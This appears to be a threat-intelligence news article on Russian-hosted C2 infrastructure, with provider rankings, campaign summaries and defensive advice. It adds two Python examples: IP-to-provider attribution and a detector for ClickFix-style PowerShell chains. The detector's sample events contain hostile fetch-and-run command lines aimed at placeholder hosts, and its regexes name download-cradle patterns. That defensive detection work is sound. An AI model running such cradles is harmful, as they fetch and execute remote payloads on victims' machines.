Russian C2 Servers Mapped Across 165 Hosting Providers
Key Takeaways
- Over 1,250 active command-and-control (C2) servers were identified within Russian hosting environments.
- These C2 servers are distributed across 165 different Russian hosting providers, including shared hosting, virtual servers, and telecommunication networks.
- The infrastructure supports a wide range of malicious activities, from malware distribution and phishing to information stealing and botnet operations.
- Tooling seen on this infrastructure includes the Keitaro traffic distribution system, the IoT botnets Hajime, Mozi, and Mirai, and offensive security frameworks such as Cobalt Strike.
- Multiple active campaigns, such as those distributing Latrodectus v2.3, Lumma Stealer, Remcos RAT, SHADOWSNIFF, SALATSTEALER, and BoryptGrab, are linked to this C2 network.
Cybersecurity experts have uncovered an extensive and organized network of malicious infrastructure operating largely undetected within Russia’s commercial hosting sector. This discovery highlights the deep entrenchment of cybercriminal operations within legitimate internet services.
During a three-month analysis period, from January 1 to April 1, 2026, researchers documented over 1,250 active command-and-control (C2) servers. These servers were found distributed across 165 distinct Russian infrastructure providers, encompassing shared hosting, virtual private servers, and various telecommunications networks, as detailed in a comprehensive report by Hunt.io analysts.
The Ubiquitous Threat of C2 Servers
C2 servers are critical components in most cyberattacks, serving as the communication hub for threat actors to issue commands to compromised systems and exfiltrate stolen data. The sheer volume of over 1,250 active C2 servers simultaneously residing within Russian hosting providers underscores the scale at which malicious infrastructure has integrated into mainstream commercial networks.
Crucially, these servers are not confined to a few isolated internet corners. Their widespread distribution across 165 different providers complicates detection and blocking efforts, allowing attackers to maintain their operations with greater anonymity and resilience.
Hunt.io analysts and researchers identified these patterns through their Host Radar intelligence module. This tool specializes in correlating C2 servers, phishing infrastructure, open malicious directories, and public indicators of compromise (IoCs) back to their underlying hosting providers. This methodology offers crucial provider-level visibility, transforming ephemeral IP addresses into actionable intelligence by revealing systematic patterns in how malicious infrastructure is deployed and reused across Russian hosting environments.
Across the entire dataset, Host Radar identified approximately 1,290 malicious artifacts during the observation period. C2 infrastructure constituted the vast majority, accounting for roughly 88.6% of all detected activity with 1,252 confirmed servers. Other malicious elements included open directories (5.3%), phishing sites (4.9%), and publicly reported indicators of compromise (1.2%).
Several hosting providers emerged as significant hosts for this illicit activity. TimeWeb led the list with 311 detected C2 servers over the 90-day period. Following closely were WebHost1 with 140, REG.RU with 138, VDSina with 86, and PROSPERO OOO with 80.
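The provider-level view described above (ephemeral IPs rolled up to the hosting provider that owns the prefix) can be reproduced in miniature. The following is an added example written for this page; it is not Hunt.io's Host Radar code. The prefix table uses RFC 5737 documentation ranges with made-up provider names, and the observation list is constructed; a real deployment would populate the table from BGP/WHOIS data and the observations from a threat feed.

```python
"""Roll up C2/phishing/open-directory observations to hosting providers.

Added example, not Hunt.io's Host Radar implementation. The prefix table and
the observations below are constructed: RFC 5737 ranges stand in for provider
allocations and the provider names are hypothetical.
"""
import ipaddress
from collections import Counter, defaultdict

# Constructed, hypothetical prefix-to-provider table. A more specific prefix
# (the /25) is included to show longest-prefix matching, as happens with
# resellers that sub-allocate from a parent provider's block.
PREFIX_TABLE = {
    "192.0.2.0/24": "Provider-A",
    "192.0.2.128/25": "Provider-A-Reseller",
    "198.51.100.0/24": "Provider-B",
    "203.0.113.0/24": "Provider-C",
}

# Constructed sample observations: (ip, artifact_type).
OBSERVATIONS = [
    ("192.0.2.10", "c2"),
    ("192.0.2.11", "c2"),
    ("192.0.2.200", "c2"),        # inside the /25, so attributed to the reseller
    ("192.0.2.201", "phishing"),
    ("198.51.100.5", "c2"),
    ("198.51.100.6", "open_dir"),
    ("203.0.113.7", "ioc"),
    ("10.0.0.1", "c2"),           # not covered by the table -> unattributed
]


def build_index(table):
    """Parse prefixes once and sort most-specific first so that the first
    containing network is the longest-prefix match."""
    nets = [(ipaddress.ip_network(p, strict=False), name) for p, name in table.items()]
    nets.sort(key=lambda t: t[0].prefixlen, reverse=True)
    return nets


def attribute(ip, index):
    """Return the provider owning the most specific prefix containing ip,
    or None when no prefix matches."""
    addr = ipaddress.ip_address(ip)
    for net, name in index:
        if addr in net:
            return name
    return None


def aggregate(observations, table=PREFIX_TABLE):
    """Tally artifacts per provider, per type, and per provider-by-type."""
    index = build_index(table)
    per_provider, per_type = Counter(), Counter()
    by_type = defaultdict(Counter)
    for ip, kind in observations:
        provider = attribute(ip, index) or "unattributed"
        per_provider[provider] += 1
        per_type[kind] += 1
        by_type[provider][kind] += 1
    return per_provider, per_type, dict(by_type)


def ranking(observations, table=PREFIX_TABLE, kind="c2"):
    """Providers ranked by count of one artifact type (default: C2 servers),
    ties broken alphabetically for a stable report."""
    _, _, by_type = aggregate(observations, table)
    rows = [(p, c[kind]) for p, c in by_type.items() if c[kind]]
    return sorted(rows, key=lambda r: (-r[1], r[0]))


def share(per_type, kind):
    """Percentage of the whole dataset made up by one artifact type."""
    total = sum(per_type.values())
    return round(100.0 * per_type[kind] / total, 1) if total else 0.0


if __name__ == "__main__":
    _, per_type, _ = aggregate(OBSERVATIONS)
    print("C2 ranking by provider:", ranking(OBSERVATIONS))
    print("C2 share of all artifacts: %.1f%%" % share(per_type, "c2"))
```

The "unattributed" bucket matters in practice: an IP that falls outside the prefix table is not evidence of a clean host, only of a stale table, so keep the prefix data refreshed alongside the indicator feed.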
Malware Families and Active Campaigns
Utilizing their HuntSQL analytics platform, researchers queried telemetry data across Russian networks to pinpoint the malware families most frequently associated with C2 infrastructure. The findings revealed a diverse ecosystem of threats.
Keitaro, a traffic distribution system frequently abused to redirect visitors to malware, dominated the dataset with 587 unique C2 IP addresses, the largest concentration observed. IoT-focused botnets also featured prominently: Hajime was linked to 191 C2 servers, and both Mozi and Mirai showed ongoing abuse of compromised routers and embedded devices.
Legitimate remote-management and offensive security tooling repurposed for malicious use was also detected, including Tactical RMM (87 endpoints), Cobalt Strike variants (55 instances combined), Sliver, and Ligolo-ng. Scanning and phishing tools such as Acunetix, Interactsh, and Gophish were identified as well, showing that this infrastructure supports reconnaissance and credential theft in addition to direct intrusion.

The gravity of these findings is underscored by active campaigns directly linked to this infrastructure. One notable campaign on JSC TIMEWEB infrastructure used a fake-CAPTCHA lure known as "ClickFix", which tricks the user into pasting and running a PowerShell command. That command downloaded Latrodectus v2.3, which then communicated with attacker-controlled domains.
Infrastructure hosted by REG.RU was implicated in a Lumma Stealer operation. This campaign exploited Google Groups redirectors to distribute malicious archives targeting both Windows and Linux systems. On Hosting Technology LTD infrastructure, the SmartApeSG campaign deployed the Remcos RAT through fake CAPTCHA prompts on compromised websites, achieving persistence via DLL sideloading.
Beget LLC infrastructure was tied to the UAC-0252 campaign. This operation involved impersonating Ukrainian government institutions and deploying SHADOWSNIFF and SALATSTEALER infostealers by exploiting a WinRAR vulnerability, tracked as CVE-2025-8088.

Separately, Proton66 OOO infrastructure was connected to a BoryptGrab infostealer operation that abused over 100 public GitHub repositories through SEO manipulation tactics.
What You Should Do
- Prioritize Provider-Level Monitoring: Treat provider-level monitoring of the hosts with the highest C2 density (TimeWeb, WebHost1, REG.RU, VDSina, and PROSPERO OOO) as a core defensive priority; individual C2 IPs rotate, the providers they sit on change far less often.
- Monitor Outbound Connections: Alert on, and where business needs allow block, outbound connections to Russian Autonomous System Numbers (ASNs) known to host C2 activity. Keep the ASN list current, since allocations change, and review hits before blocking wholesale where legitimate traffic to those networks exists.
- Enhance Threat Intelligence: Integrate threat intelligence that covers infrastructure-level indicators (IPs, prefixes, ASNs, domains) rather than only file hashes, so that reused hosting is caught even when the payload changes.
- Restrict PowerShell Chains: Restrict or block "curl-to-PowerShell" download-and-execute chains, the pattern ClickFix-style lures rely on, and alert on PowerShell launched from the Run dialog or a browser with hidden-window, policy-bypass, or encoded-command flags.
- Maintain IoT/Edge Device Visibility: Ensure comprehensive visibility and security measures for IoT and edge devices, given the persistent activity of botnets like Hajime, Mozi, and Mirai.
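Two of the recommendations above, catching ClickFix-style PowerShell chains and watching egress to watchlisted ASNs, reduce to rules over endpoint and network telemetry. The script below is an added example written for this page, not code from Hunt.io or HackersRadar. The events are constructed to resemble EDR/Sysmon process-creation and network-connection records, and the ASN watchlist is hypothetical (AS64496 and AS64497 are reserved for documentation); a deployment would substitute the ASNs of the providers named in the report, resolved from current BGP data, and feed events from its own telemetry.

```python
"""Triage constructed endpoint/egress events for ClickFix-style PowerShell
chains and egress to watchlisted ASNs.

Added example, not from the report or the site. Event shapes and the ASN
watchlist are hypothetical; AS64496/AS64497 are documentation ASNs.
"""
import re

# Hypothetical watchlist; replace with the report's providers' real ASNs.
ASN_WATCHLIST = {64496: "Provider-A (hypothetical)", 64497: "Provider-B (hypothetical)"}

# Building blocks of a download cradle as seen in ClickFix lures.
DOWNLOAD = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
PIPE_TO_PS = re.compile(r"\b(curl|wget)(\.exe)?\b[^|]*\|\s*(powershell|pwsh)", re.I)
HIDDEN = re.compile(r"-(w|win|windowstyle)\s+hidden", re.I)
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
BYPASS = re.compile(r"-(ep|ex|executionpolicy)\s+bypass", re.I)
PS_IMAGES = ("powershell.exe", "pwsh.exe")
# Parents a pasted lure command typically arrives from: the Run dialog
# (explorer.exe) or a browser-launched prompt.
LURE_PARENTS = ("explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe")


def classify_process(ev):
    """Return reasons a process-creation event looks like a download cradle;
    an empty list means nothing matched."""
    cmd = ev.get("command_line", "")
    reasons = []
    if PIPE_TO_PS.search(cmd):
        reasons.append("curl/wget output piped into PowerShell")
    if ev.get("image", "").lower() not in PS_IMAGES:
        return reasons
    dl, ex = bool(DOWNLOAD.search(cmd)), bool(EXECUTE.search(cmd))
    if dl and ex:
        reasons.append("download-and-execute cradle in one command")
    if ENCODED.search(cmd):
        reasons.append("encoded command")
    if HIDDEN.search(cmd) and (dl or BYPASS.search(cmd)):
        reasons.append("hidden window combined with download or policy bypass")
    if ev.get("parent_image", "").lower() in LURE_PARENTS and (dl or HIDDEN.search(cmd)):
        reasons.append("PowerShell spawned from Run dialog/browser with lure flags")
    return reasons


def classify_connection(ev):
    """Flag egress to a watchlisted ASN. Assumes dst_asn was enriched upstream
    (e.g. from a BGP feed); raw flow records carry only the IP."""
    asn = ev.get("dst_asn")
    if asn in ASN_WATCHLIST:
        return ["egress to watchlisted ASN %d (%s), dst port %s"
                % (asn, ASN_WATCHLIST[asn], ev.get("dst_port"))]
    return []


def triage(events):
    """Return [(event_id, [reasons...]), ...] for every event that matched."""
    alerts = []
    for ev in events:
        reasons = classify_process(ev) if ev["type"] == "process" else classify_connection(ev)
        if reasons:
            alerts.append((ev["id"], reasons))
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": "powershell.exe", "parent_image": "explorer.exe",
     "command_line": 'powershell -w hidden -ep bypass -c "iex (irm https://captcha.example/verify.txt)"'},
    {"id": 2, "type": "process", "image": "powershell.exe", "parent_image": "cmd.exe",
     "command_line": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"id": 3, "type": "process", "image": "cmd.exe", "parent_image": "explorer.exe",
     "command_line": "cmd.exe /c curl -s https://files.example/x.txt | powershell -"},
    {"id": 4, "type": "process", "image": "powershell.exe", "parent_image": "explorer.exe",
     "command_line": 'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"'},
    {"id": 5, "type": "network", "dst_ip": "192.0.2.44", "dst_asn": 64496, "dst_port": 443},
    {"id": 6, "type": "network", "dst_ip": "198.51.100.9", "dst_asn": 65000, "dst_port": 443},
]

if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

Event 2 is the deliberate false-positive check: an administrator's scheduled script with `-ExecutionPolicy Bypass` but no hidden window, no download, and a non-lure parent should not fire. The ASN rule is only as good as the enrichment feeding `dst_asn`; without it, fall back to prefix matching against the provider's announced ranges.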
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.